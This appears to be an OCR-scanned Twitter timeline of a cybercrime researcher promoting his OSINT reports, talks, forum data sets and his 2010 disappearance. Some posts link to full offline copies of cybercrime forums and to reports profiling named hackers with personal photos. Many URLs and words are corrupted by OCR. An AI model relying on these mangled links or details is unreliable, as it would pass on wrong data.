Believe it or not - I’ve joined forces with https://t.co/X2z28aSWfB - the actual owner 
of the infamous https://t.co/BTuSMsPDol search engine - https://t.co/EwhbEvzy2e New 
Blog here: https://t.co/2P1coLkWd8 Keep it coming! 


*1 
09:48 
New Post on https://t.co/X2z28aSWFfB - "A Brief Introduction to the New 
https://t.co/X2z28aSWfB Project - or Who’s Dancho Danchev?" - 
https://t.co/uWOO10Xi0K #security #cybercrime #malware 
09:48 


New Post on https://t.co/X2z28aSWFfB - "Announcing https://t.co/X2z28aSWfB’s World 
Hacker Global Domination Group (WHGDG) Call for Security and Privacy Papers and 
Call for Innovation" - https://t.co/BfsEwOlOLn #security #cybercrime @malware 
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10 - Friday 


12:05 


Bookmark this today - https://t.co/eCPsGygJuG and stay tuned for upcoming 
high-profile Talk-Show on Security and Privacy hosted at https://t.co/X2z28aSWFfB. 
New blog here - https://t.co/2PlcoLkWd8 #security #cybercrime #malware 


27 - Monday 


06:27 
New Report - "A Qualitative and Technical Collection OSINT-Enriched Analysis of the 
Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital Security 
Team" - https://t.co/thOxX1WVsb #security #cybercrime #malware 
31 - Friday 


07:46 


Just joined Peerlyst - https://t.co/CYsLxqbKbb say "hi" by reading my first post. Stay 
tuned! #security #cybercrime #malware 


February 


11 - Tuesday 


13:16 
https://t.co/8rMfdfVdXP #security #cybercrime #malware #cybersec #cyberthreat 
#threatintelligence #Threatintel #hacker #hackers #hacking 


12 - Wednesday 


08:44 


https://t.co/yJKJbcsoJ4 #security #cybercrime #malware #cybersecurity #cybersec 
#cyberthreat #hacker #hackers #hacking 


16 - Sunday 


02:53 


New Post - "Exploring the “Let’s Name and Shame Them” Intelligence Community 
Mentality - Keep it coming?" - https://t.co/AsvBvgR7sF #security #cybercrime 
#malware #cybersecurity #cybersec #Threatintel 


21 *1 
03:50 
New Post - "The Top 10 Off-The-Shelf Cyber Threat Intelligence Career Positions - And 


Which One You Should Pick Up?" - https://t.co/SZNSZk4ZSO #security #cybercrime 
#malware #cybersecurity #cybersec #Threatintelligence #Threatintel 
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*%2 
09:29 


Grab a copy today! - "A Qualitative and Technical Collection OSINT-Enriched Analysis 
of the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital 
Security Team" - https://t.co/VZxHGop83x #security #cybercrime #malware 
#cybersecurity 


18 - Tuesday 


07:07 


Check this out - https://t.co/BKKLYQSBQB - The World’s Leading Cyber Threat 
Intelligence Products Portal! Inquire about your Cyber Threat Intelligence needs 
today! 
15333 


New Post - Dancho Danchev’s Disappearance - 2010 - Official Complaint Against 
Republic of Bulgaria - https://t.co/4kSkLVCIgA #security #cybercrime #malware 
#CyberSecurity #CyberSec 


*1 


19 - Wednesday 


06:37 


Grab a copy of 2015’s Edition of "Exposing Ashiyane Digital Security Team - Report" 
today! - the single most comprehensive analysis of Iran’s Hacking Scene - 
https://t.co/uzDPPRvtlIH #security #cybercrime #malware #CyberSecurity 

#Threatintel #ThreatHunting 


*1 


24 - Monday 


03:21 


New Portfolio of Cybercrime Forum Data Sets for 2020 just added at 
https://t.co/BKKLYQSBQB #security #cybercrime #malware #CyberSec 
#cybersecurity #Threatintel 


*%2 
03:26 


Grab an account today! - https://t.co/WIBGTU5ryT #security #cybercrime #malware 
#CyberSec #cybersecurity #Threatintel 


*1 
33 


26 - Wednesday 


07:58 


Grab a copy of my 2020’s report on Iran’s Hacking Scene - https://t.co/VZxHGop83x 
including 2015’s edition - https://t.co/uzDPPRvtlH and help me fuel growth into my 
research! #security #cybercrime #malware #CyberSecurity #ThreatHunting 
#Threatintel 


March 


5 - Thursday 


06:00 


New Cybercrime Forum Data Sets Portfolio update! - https://t.co/8KKLYRacl9 
#security #cybercrime #malware #CyberSecurity #Threatintelligence 
#ThreatHunting 


7 - Saturday 


10:28 


New Post - "Enter a Bold New World of Hacking and Security - Embrace the 
Cybertronics VR Platform for Hackers and Security Experts Today! We’re Hiring!" - 
https://t.co/feDN56d2is #security #cybercrime #malware 


21 *%1 


11 - Wednesday 


09:06 


RSVP Today! - https://t.co/J[97DNeN2nY #security #cybercrime #malware 
#CyberAttack #cybersecurity #CyberSec #Threatintel #threatintelligence 


17 - Tuesday 


04:42 


Dare to spend a moment of your precious time? Check this out - 
https://t.co/Yqv3V8COOd and join us today! #security #cybercrime #malware 
#CyberAttack #cybercrime #CyberSecurity #Threatintel 


24 - Tuesday 


10:01 
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Re-claiming dominance over the communication channel - in progress! Check this 
out - https://t.co/fnswrm8KWP re-share pls! #security #cybercrime #malware 
#CyberSecurity #CyberAttack 
10:08 


Check this out - https://t.co/fnswrm8KWP in particular the Greets and Shouts section! 
cc: @gadievron @alexeck @stevesantorelli @Treadstone71LLC @jeffreycarr 
@HostExploit @bobmcmillan @roblemos @jorgemieres @MarcusSachs @gollmann 
cheers! stay tuned! 

10:17 


Check this out - https://t.co/fnswrm8KWP in particular the Greets and Shouts section! 
cc: @anthonyaykut @kevtownsend @dwreski @cryptome_org @ericgoldman 
@johullrich cheers! stay tuned! 


26 - Thursday 


09:18 


Missing Koobface? Check out my Keynote on Tracking down and Taking Down the 
Koobface botnet circa 2016 - https://t.co/q5iTxLwmK1 #security #cybercrime 
#malware #CyberAttack #CyberSecurity #cyberthreats #Threatintel 
#Threatintelligence #ThreatHunting 


25 *1 


April 


2 - Thursday 


08:06 


Finally! I’ve found a VR application developer for the Cybertronics - VR for Hackers 
and Security Experts platform - https://t.co/feDN56d2is gOt Bitcoin? Can you make a 
modest donation to support the project? Approach me at dancho.danchev@hush.com 


*1 
09:45 
Anyone interested in inviting me to speak at their event? Approach me at 
dancho.danchev@hush.com https://t.co/ifz5hlv3pA 
09:46 
Takes you back - doesn’t it? Stay tuned! https://t.co/sYHup|Xrd7 
09:46 


Quite a novel approach to say "hi". Keep it coming! Stay tuned! 
https://t.co/XEO3UZj9w8s 
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*1 
09:58 


Team @Webroot long time no hear. Now I’m officially back - https://t.co/cjIBXsIP49 | 
wanted to say big thanks for bringing me on board circa 2012-2014. It was a pleasure 
and an honor to work with you. Check this out - https://t.co/xLcu3tz4iF Keep in touch! 

https://t.co/DiJkBCn1Yz 


10:01 


Hello! Pleasure and an honor to came across to this Tweet. Much appreciated for the 
actual award. Catch up with some of my research here - https://t.co/wEK5XX2J9Z and 
keep it coming! Stay tuned! https://t.co/vqghROegneh 


*1 
13:05 


@goretsky This is pretty interesting. It times of war these are usually among the few 
"touch points" with another country’s leadership that shouldn’t be bothered. And 
since when achieving a "media echo" effect constitute espionage? Appreciate my 

rhetoric. 


*1 
13:10 
@Reuters @josephmenn @WHO @jc_stubbs @razhael @Bing_Chris Check out my 
state of the art work on Iran’s Hacking Scene - https://t.co/8BKKLYQSBQB 
13:14 


@stevewerby @jack_daniel @thedarktangent @todayininfosec @hackerfantastic 
@neilhimself Guys - check this out - https://t.co/fnswrlR9yf and 
https://t.co/2P1coL3kOy cheers! 


3 - Friday 
08:49 
@evacide Check this out - https://t.co/8BKKLYQSBQB 
08:59 
@Malwarelnt Check this out - https://t.co/8BKKLYQSBQB 

09:00 

@Treadstone71LLC Check this out - https://t.co/8KKLYQSBQB 
09:01 

@RecordedFuture Check this out - https://t.co/8BKKLYQSBQB 
09:03 


@chillum Check this out - https://t.co/8BKKLYQSBQB 
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09:04 
@memricjl Check this out - https://t.co/BKKLYQSBQB 


09:06 
@ThreatConnect @TheJusticeDept Check this out - https://t.co/BKKLYQSBQB 


7 - Tuesday 


12:00 


Are you staying at home? I’m currently offering a Coupon Code for my Iran Hacking 
Scene research report analysis worth $100 which you can claim by vising - 
https://t.co/kjhbWF2a38 and https://t.co/DaJj/KRQTel the actual code - Y3FJPT8R Stay 
tuned! 


27 - Monday 


07:32 


Check this out! - https://t.co/ETFyOUGTA2 we’re proud to announce the general 
availability of https://t.co/X2Z28aSWFfB’s flagship Hacking and Security search engine! 
Over 2,223,579 results and counting! Check out the main page - 
https://t.co/fnswrm8KWP 


07:36 


We're back! Check out the recently launched https://t.co/BTUuSMsPDol flagship IRC 
Network for Hackers and Security Experts - https://t.co/Euilyy8gyZ Grab a copy of 
HexChat - https://t.co/I7DqVpdnXX and join us today! Stay tuned! 


28 - Tuesday 


08:22 


RT @Inxsec: Identifying info that could be used against an organization is critical in 
mitigating cyber risk. In a new feature article, @In... 


10:04 


https://t.co/BTUSMSPDol is back! Join us on IRC today! Register a channel for your 
group or organization today! - https://t.co/Euilyy8gyZ stay tuned! #security 
#cybercrime #malware #Threatintelligence #Threatintel 


*%2 


July 
17 - Friday 
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11:47 


Two High-Profile OSINT And Technical Collection Analysis Reports On Iran’s Hacking 
Scene And The Ashiyane Digital Security Team - Available For Free! - 
https://t.co/N5CJFpE9mq #security #cybercrime #malware 


21 *%1 

11:48 

The Relevance And Irrelevance Of CIA’s Vault 7 Cyber Weapons Arsenal - An In-Depth 

OSINT Analysis - https://t.co/lu3IlptMBQR #security #cybercrime #malware 
11:49 
Exposing Ashiyane Digital Security Team - An OSINT Analysis - 
https://t.co/9InvSK9OLSL #security #cybercrime #malware 
11:50 
Exposing Iran’s Hacking Scene And Hacking Ecosystem Major Web Site Repositiories - 
An OSINT Analysis - https://t.co/SlHn4gq8Lo #security #cybercrime #malware 

11:51 


Exposing Bulgaria’s Involvement In Cold War Espionage - Who Stole The PC And Build 
A Fake Pro-Western Empire? - An OSINT Analysis - https://t.co/nFClgn9Ky! #security 
#cybercrime #malware 


11:51 


Exposing The Modern Cybercrime Ecosystem - A Compilation Of Currently Active 
Cyberfrime-Friendly Forum Communities - https://t.co/sS5SFL1LYIZ #security 
#cybercrime #malware 


11:52 


Exposing The Modern Cybercrime Ecosystem - A Compilation Of Currently Active 
Cyberfrime-Friendly Forum Communities - Part One - https://t.co/3FWjdL5cN8 
#security #cybercrime #malware 


11:53 


Exposing The Modern Cybercrime Ecosystem - A Compilation Of Currently Active 
Cyberfrime-Friendly Forum Communities - Part Two - https://t.co/vu33SsbxLi 
#security #cybercrime #malware 


11:53 


Exposing The Modern Cybercrime Ecosystem - A Compilation Of Currently Active 
Cyberfrime-Friendly Forum Communities - Part Three - https://t.co/ySOSMHJZyU 
#security #cybercrime #malware 


11:54 


Exposing The Modern Cybercrime Ecosystem - A Compilation Of Currently Active 
Cyberfrime-Friendly Forum Communities - Part Four - https://t.co/bzuodixT7P 
#security #cybercrime #malware 
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11:55 


Cybercrime Forum Data Set - 2019 - Free Download! - https://t.co/9anuGuTg1V 
#security #cybercrime #malware #Threatintel #ThreatHunting #CyberSecurity 
#CyberAttack #cyberattacks #Botnet 


18 - Saturday 


09:05 


I’ve decided to make my offline cybercrime forum data set for 2019 publicly available 
with the idea to solicit your participation in my currently ongoing Law Enforcement 
and OSINT operation "Uncle George" https://t.co/9anuGuTg1V stay tuned! 

09:13 


Quick Q: "What do you do for a living? A: | do OSINT cybercrime research threat 
intelligence gathering and I’m an aspiring "4th party collector" supporting U.S Law 
Enforcement and the U.S Intelligence Community with state of the art cyber threat 

research. 


*1 
10:09 


https://t.co/fnswrm8KWP - RT pls! 


20 - Monday 


03:57 


Missing Koobface? Watch my Keynote at CyberCamp 2016 here - 
https://t.co/UTo6t4uACd and check out the actual PPT here - https://t.co/oo5hjgR3qE 
stay tuned! #security #cybercrime #malware https://t.co/FTCvyFY6DP 
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22 - Wednesday 


00:57 


Anyone using Jabber/OMEMO? Here’s mine - ddanchev@xmpp.jp can you please hook 
with me now so that we can catch up? Cheers! Dancho 


*%2 
11:42 


This is me circa 2010 in Sofia, Bulgaria meeting with @rivarichmond to discuss the 
Koobface botnet. Guess who took the shot? God bless and let’s don’t forget about 
the rest! Keep it coming! Stay tuned! Cheers! Dancho. https://t.co/wt4zcALaZC 
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26 - Sunday 


05:51 
Anyone interested in having me speak at their event? #security #cybercrime 
#malware 
*1 
27 - Monday 
03:43 


Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of 
Bulgaria - https://t.co/4kSkLVCIgA #security #cybercrime #malware 


28 - Tuesday 


10:07 


Dear guys, do you remember me? I’ve decided to take this shot and say "hi" and "I’m 
back" to the security industry. Catch up with what I’ve been up to at 
https://t.co/JTcqOaYgET and https://t.co/fnswrm8KWP and stay tuned! RT pls and say 
"hi". Cheers! Dancho. https://t.co/e9cML4p862 
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*%2 


23:11 


@IcOdeWs Hi @IlcOdeWs thanks for the reply. Feel free to ping me on case you need 
any sort of research assistance or actual research advice and guidance and I'd be 
happy to help. Keep up the good work. Cheers! Dancho. 


*1 
23:13 
@XephyChan Hello. Can you post it here? You can also send a message to 
dancho.danchev@hush.com cheers! Dancho. 
23:15 


@OxOOOFED Hello. Can you post here? You can send a message at 
dancho.danchev@hush.com cheers! Dancho. 
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29 - Wednesday 


05:19 


Dear @ThreatConnect - thanks a lot for featuring my personal https://t.co/JTcqOaYgET 
here - https://t.co/IKnLAFoWEO pleasure and an honor to work with you and to touch 
base with you! Cheers! Dancho. 


*1 


August 


14 - Friday 


08:44 
Thanks! Stay tuned! Dancho. https://t.co/5Kg3jDaZGp 


24 - Monday 


03:44 

Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of 

Bulgaria - https://t.co/4kSkLVCIgA 
03:44 
Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two - 
https://t.co/xGvnXPIOhj 

03:47 

Check this out! - Dancho Danchev’s Blog - Official Offline Multiple E-book Formats 

Direct Download Available for Free! - https://t.co/Ot8BkZEgbG - 
https://t.co/61hCUjQIisX #security #cybercrime #malware 
04:09 
Cybercrime Forum Data Set - 2019 - Free Download! - https://t.co/9anuGuTg1V 

#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
08:41 


Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Active 
Cyberfrime-Friendly Forum Communities - https://t.co/sS5SF1LYIZ #security 
#cybercrime #malware 


08:42 


Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Active 
Cyberfrime-Friendly Forum Communities - Part One - https://t.co/3FWjdL5cN8 
#security #cybercrime #malware 
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08:42 


Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Active 
Cyberfrime-Friendly Forum Communities - Part Two - https://t.co/vu33SsbxLi 
#security #cybercrime #malware 


08:43 


Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Active 
Cyberfrime-Friendly Forum Communities - Part Three - https://t.co/ySOSMHJZyU 
#security #cybercrime #malware 


08:43 


Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Active 
Cyberfrime-Friendly Forum Communities - Part Four - https://t.co/bzuodixT7P 
#security #cybercrime #malware 


28 - Friday 


07:19 


Check this out! Dancho Danchev’s Blog - Official Offline Multiple E-book Format 
Compilation Direct Download! - https://t.co/5ZZnaFLNpY #security #cybercrime 
#malware #CyberSecurity #CyberAttack #cyberattacks #Threatintel 
#Threatintelligence 


07:20 


Check this out! Official Cybercrime Forum Data Set for 2019 Direct Download! - 
https://t.co/ToOEwv6F58A #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #Threatintel #Threatintelligence 


07:44 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/isbA29DVfj - https://t.co/7Tad6ODaOx Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 


07:45 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - gerki.pw- https://t.co/E4FmL63g1R Join Operation "Uncle George" Today! - 
https://t.co/PRzdRWdpPe 


07:46 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - ProLogic - https://t.co/xne7nN6XIT Join Operation "Uncle George" Today! - 
https://t.co/PRzdRWdpPe 


07:46 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - SEOForum - https://t.co/kKGBRXU9q24 Join Operation "Uncle George" 
Today! - https://t.co/PRzdRWdpPe 
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07:47 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/2fdeO7myr2 - https://t.co/ng2x32RDxp Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 

07:47 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/KbahacYnmg - https://t.co/FvQtBiINDf Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 
07:48 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/1llwm7j7aSH - https://t.co/SINQKsAzq] Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 
07:48 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/BUdEUr0IQO - https://t.co/AxVhTk6t50 Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 

07:49 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/vCejx13NC] - https://t.co/9zUfardUjt Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 
07:50 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/lI930aleQko - https://t.co/jdx2 7AMNzj Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 
07:50 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - PhreakerPro - https://t.co/FKdUnsKrAa Join Operation "Uncle George" 
Today! - https://t.co/PRzdRWdpPe 
07:50 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - Master-X - https://t.co/z7IdtX3CWL Join Operation "Uncle George" Today! - 
https://t.co/PRzdRWdpPe 


07:51 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/3cJ2u6zDrl - https://t.co/O3RpD4XYiZ Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 


07:55 
Here are some sample findings - https://t.co/Ni39ctkT1d from a current participant in 
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my currently ongoing OSINT and Law Enforcement Operation called "Uncle George". 
Dare to join me? Drop me an email at dancho.danchev@hush.com Stay tuned! 
07:59 


New Post - Announcing Law Enforcement and OSINT Intelligence Operation "Uncle 
George" - Join Me Today! - Part Three - https://t.co/GfEGqVlpyj #security #cybercrime 
#malware 


07:59 


New Post - Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber 
and XMPP Accounts Including Email Address Accounts - Part Two - 
https://t.co/DBynRtsT0e #security #cybercrime #malware 


10:37 


Folks - catch up in terms of what I’ve been up to in terms of research on Medium - 
https://t.co/GtWdP1FvOc #security #cybercrime #malware #CyberSecurity 
#CyberSec #CybersecurityNews #Threatintelligence #Threatintel 


31 - Monday 


00:13 


Folks! Grab a direct download copy of my Iran CNO Study circa 2015 from here - 
https://t.co/R2YnpeTX7o including my second Technical Collection Iran Hacking 
Ecosystem study from here - https://t.co/K6UATSRIC9 Stay tuned! 
https://t.co/YSSNIPJJKr 
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Dancho Danchev Presents! Brace Yourselves! 


Grab today a free copy of the Second Free. 

Exposing Iran's Hacking Scene OSINT-Enaétied and 
Technica gongsion Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 


Organization including Individual Researcher Use - This 1§ 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


Commercial Copy Available! Approach me toda 
ppprnec yo r manager toda mpower your hreat 
Intelligence Team! An USINT Conducted Today is a 
Tax Payers Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


00:16 
You can also check some of the findings from the Technical Collection research and 


analysis here - https://t.co/SlLHn4gq8Lo including to actually go through my FBI Most 
Wanted - OSINT Analysis checklist here - https://t.co/BrbiJAKMx2 Stay tuned! 


00:23 
Have you ever wanted to take one of the security industry’s leading cybercrime and 
threat intelligence gathering publication on your E-book reader? Here’s the actual 


link - https://t.co/JT676NfPZI including a direct download copy - 
https://t.co/5ZZnaFLNpy https://t.co/XMMVPjZ4kS 


*1 
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Dancho Danchev 


An In-Depth Picture 
Inside Security 
Researcher's Dancho 
Danchev Understandin 
of Security Hacking an 
Cybercrime Incidents 


Dancho 


Danchev's 
Personal 
Security 
Hacking and 
Cybercrime 
Research 
Memoir 


September 


1 - Tuesday 


09:24 


New Post - Cyber Security Project Investment Proposal - Cybertronics - VR for Hackers 
and Security Experts - Support me Today! - https://t.co/4Hfal4R4gD #security 
#cybercrime #malware #VirtualReality 


09:42 


This is where the magic happens since December, 2005. https://t.co/JTcqOaYgET - 
https://t.co/fnswrm8KWP God bless and let’s don’t forget about the rest! Stay tuned! 
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https://t.co/Mo0OAQADAXD 


*1 


09:44 


This is me presenting at RSA Europe 2012. Here’s the actual PPT - 
https://t.co/y78Fq4aC1l CC: @RSAConference @RSAEurope #security #cybercrime 
#malware https://t.co/spjO7dQNF4 
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09:46 


This is me presenting at InfoSec Europe 2012 on behalf of Webroot Inc. CC @Webroot 
@WebrootEMEA #security #cybercrime #malware https://t.co/8pwJk8nyGR 
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09:48 


This is me presenting at CyberCamp 2016. Here’s the actual PPT - 
https://t.co/oo5hjgR3qE CC: @CybercampEs @INCIBE @incibe cert #security 
#cybercrime #malware https://t.co/yke5cTEm8c 
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2 - Wednesday 


07:11 
#NowPlaying - Paranea - Spheres - https://t.co/dSuZAy5wov #security #cybercrime 
#malware 
el 
07:14 


Do you miss Koobface? Watch my Keynote at @CybercampEs circa 2016 on 
"Exposing Koobface - The World’s Largest Botnet" - https://t.co/q5iTxLwmK1 
#security #cybercrime #malware #CyberSecurity #cyberattacks #Threatintel 


07:25 


Check this out! - All the major personal Iran-based Web sites of hackers and hacking 
groups profiled and exposed - https://t.co/SLHn4gq8Lo personal photos included! 
Stay tuned! CC: @Treadstone71LLC #security #cybercrime #malware 


07:28 


Check this out! - Iran’s flagship Hacking and Security Ashiyane Digital Security Team 
profiled and exposed - https://t.co/9InvSK9LSL personal photos included! Stay tuned! 
CC: @Treadstone71LLC #security #cybercrime #malware 
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07:30 


Check this out! - "Assessing The Computer Network Operation (CNO) Capabilities of 
07:31 


the Islamic Republic of Iran - Report" - Grab a copy today! - https://t.co/R2YnpeTX7o 
CC: @Treadstone71LLC #security #cybercrime #malware 


Check this out! - "A Qualitative and Technical Collection OSINT-Enriched Analysis of 
the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital 
07:34 


Security Team" - Grab a copy today! https://t.co/xK6UATSRIC9 CC: @Treadstone71LLC 


This is the most comprehensive and publicly accessible @MaltegoHQ graph of Iran’s 
Hacking Ecosystem ever produced courtesy of me. Grab a full copy of the report 


today! - https://t.co/R2YnpeTX7o Stay tuned!@ CC: @Treadstone71LLC #security 
#cybercrime #malware https://t.co/mG4VANpnDp 
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07:36 


Check this out - "Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted 
Checklist - OSINT Analysis" - https://t.co/BrbiUAKMx2 Stay tuned! CC: 
@Treadstone71LLC @FBIMostWanted #security #cybercrime #malware 
https://t.co/E8djkjgqfU 
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07:59 


Can anyone from #Russia confirm that they’re seeing a LumenDatabase message 
when they search for my name? Here’s the actual message - 
https://t.co/NaluwhxwOh #security #cybercrime #malware https://t.co/8hDCBMelIRX 


This is a removal request under Russian Federal Law 276-FZ dated July 29, 2017. 
We are unable to publish the requested URLS. 


08:09 


Missing Dark Avenger, Durzhavna Sigurnost, Varna Hacking Group and Phreedom 
Group Bulgaria circa the 90’s? Check this OSINT Analysis - https://t.co/nFClgn9Kyl 
courtesy of me. Check out the actual Durzhavna Sigurnost archive - 
https://t.co/O7Brvyzblo 
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08:12 


Underground Forum Chatter on my disappearance - https://t.co/4kKSkKLVCIgA - 
https://t.co/xGvnXPIOhj circa 2010. Courtesy of @briankrebs Stay tuned! #security 
#cybercrime #malware https://t.co/DK2000CrcU 


08:13 


Underground Forum Chatter on my disappearance - https://t.co/4kKSkKLVCIgA - 
https://t.co/xGvnXPIOhj circa 2010. Courtesy of @XylitOl Stay tuned! #security 
#cybercrime #malware https://t.co/RWMOoxvOQC 


aS 


08:15 


Underground Forum Chatter on my disappearance https://t.co/4kSkLVCIgA - 
https://t.co/xGvnXPIOhj circa 2010. Courtesy of @XylitOl. Stay tuned! #security 
#cybercrime #malware https://t.co/q4CYfl1L26 
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08:16 


Underground Forum Chatter on my disappearance - https://t.co/4kKSkKLVCIgA - 
https://t.co/xGvnXPlOhj circa 2010. Courtesy of @XylitOl. Stay tuned! #security 
#cybercrime #malware https://t.co/nVvSy83QNm 
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R.1.P Dancho Danchev? 


08:17 


Underground Forum Chatter on my disappearance - https://t.co/4kSKLVCIgA - 
https://t.co/xGvnXPIlOhj circa 2010. Courtesy of @Xylit0l. CC: @abuse_ch Stay tuned! 
#security #cybercrime #malware https://t.co/vVKA8930Dyi 


21 *3 
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08:35 


The CIA doing "lawful surveillance"? Who would have thought? Check out my - "The 
Relevance and Irrelevance of CIA’s Vault 7 Cyber Weapons Arsenal - An In-depth 
OSINT Analysis" https://t.co/lu3IptMBQR including the C&amp;C server IPs including 
the associated MD5s. 


08:40 


Check this out! - "Exposing High Tech Brazil Hack Team Mass Web Site Defacement 
Group - An OSINT Analysis" - https://t.co/GRKPb3cAiv #security #cybercrime 
#malware 


22 *1 
08:58 


Check this out - "Assessing the Recently Leaked FSB Contractor Data - A Peek Inside 
59 


Russia’s Understanding of Social Network Analysis and Tailored Access Operations" - 
https://t.co/ldM8PDliy2 #security #cybercrime #malware 


09:02 


Check this out - "Profiling "Innovative Marketing" - The Flagship Malvertising and 
Scareware Distributor - Circa 2008 - An OSINT Analysis" - https://t.co/H7hY7kTEhI 
#security #cybercrime #malware 


*1 
09:03 


Check this out - "Exposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" 
Gang - An OSINT Analysis" - https://t.co/ewBaYgusMN #security #cybercrime 
#malware 


*1 
09:04 


Check this out - "Who's Behind the Syrian Electronic Army? - An OSINT Analysis" - 
https://t.co/Cid61EZfCw #security #cybercrime #malware 


*1 
09:07 


Check this out - "Exposing Bulgaria’s Largest Data Leak - An OSINT Analysis" - 
https://t.co/t49cZdingz #security #cybercrime #malware 
09:08 


Check this out - "Exposing Yet Another Currently Active Fraudulent and Malicious 
Pro-Hamas Online Infrastructure" - https://t.co/ipNlgAWszr #security #cybercrime 
#malware 


09:10 


Check this out - "Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - 
An Analysis" - https://t.co/oVSJhQaOyh #security #cybercrime #malware 


1 
09:11 
Check this out - "Who's Behind BakaSoftware? - OSINT Analysis" - 
https://t.co/yCfYp9r4VK #security #cybercrime #malware 
4 - Friday 
05:01 


#NowPlaying - Jamie Woon - Lady Luck (Mad Morello &amp; Igi Remix) - 
https://t.co/BHFWs7kaVr 
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5 - Saturday 


04:21 


This is me presenting at @CybercampEs on "Exposing Koobface - The World’s Largest 
Botnet". Here’s the actual PPT - https://t.co/oo5hjgR3qgE Watch the actual Keynote 
here - https://t.co/q5iTxLwmK1 Stay tuned! #security #cybercrime #malware 
https://t.co/OE7d9Lmpef 


05:06 


This is me presenting at InfoSec Europe circa 2012 with @Webroot. Here’s a full 
summary of all of my post at Webroot’s Threat Blog circa 2012-2014 - 
https://t.co/xLcu3tz4iF Stay tuned! #security #cybercrime #malware 

https://t.co/blIOWjJRizB 
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05:11 


Here’s my "Exposing the Dynamic Money Mule Recruitment Ecosystem" PPT from an 
invite-only conference - https://t.co/2cCjClx5aH Enjoy! #security #cybercrime 
#malware 


05:13 


Here’s my "Intell on the Criminal Underground - Who's Who in Cyber Crime for 
2007?" PPT - https://t.co/FMihIBNPU2 Enjoy! #security #cybercrime #malware 


22 
06:07 


Here’s my "Cyber Jihad vs Cyberterrorism - Separating Hype from Reality" PPT from 
RSA Europe 2012 - https://t.co/y78Fq4aC11 Enjoy! #security #cybercrime #malware 


7 - Monday 


08:11 


Watch my @CybercampEs Keynote on Koobface circa 2016 - here - 
https://t.co/q5iTxLwmkK1 PPT here - https://t.co/oo5hjgR3qE #security #cybercrime 
#malware #CyberSecurity #cyberattacks #CyberAttack #Threatintel 
#ThreatHunting #threatintelligence 
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22 
08:24 


Check this out! Dancho Danchev’s official "We Hate You" album on vinyl courtesy of 

"Deterrent Industries" - https://t.co/nwEjEXcvgt Who’s behind the album? Check out 

the OSINT analysis here - https://t.co/xGvnXPIOhj #security #cybercrime #malware 
https://t.co/742rApneWa 


. 4 Py 


DANCHO DANCHEV 
SUCK MY DICK 


08:28 


Listen to the original interview - https://t.co/1YtU5DVpsM [MP3] which | gave to DW 
circa 2012 on the Koobface botnet. Here’s the actual interview - 
https://t.co/9C2AfIKrVE Stay tuned! #security #cybercrime #malware 


9 - Wednesday 


05:44 


#NowPlaying - Mr. Suspect &amp; Hi Profile - Learn To Listen (Original Mix) - 
https://t.co/uaThk8IXYn 
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14 - Monday 


03:45 


New Post - Dancho Danchev’s Blog - Official Multiple E-Book Formats Full Offline 
Download Copy Available - Grab a Copy Today! - https://t.co/FsmgThl1lgh #security 
#cybercrime #malware #CyberSecurity #cyberthreats #Threatintel 
#Threatintelligence 


03:46 


New Post - Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - https://t.co/xbr9BSxfHV #security 
#cybercrime #malware #CyberSecurity #cyberthreats #Threatintel 
#Threatintelligence 


26 - Saturday 


02:12 


Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of 
Bulgaria - https://t.co/4kSkLVCIgA #security #cybercrime #malware #CyberSecurity 
#CyberAttack #CyberSec #Threatintel #Threatintelligence 


22 *1 
02:13 


Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two - 
https://t.co/xGvnXPIOhj #security #cybercrime #malware #CyberSecurity 
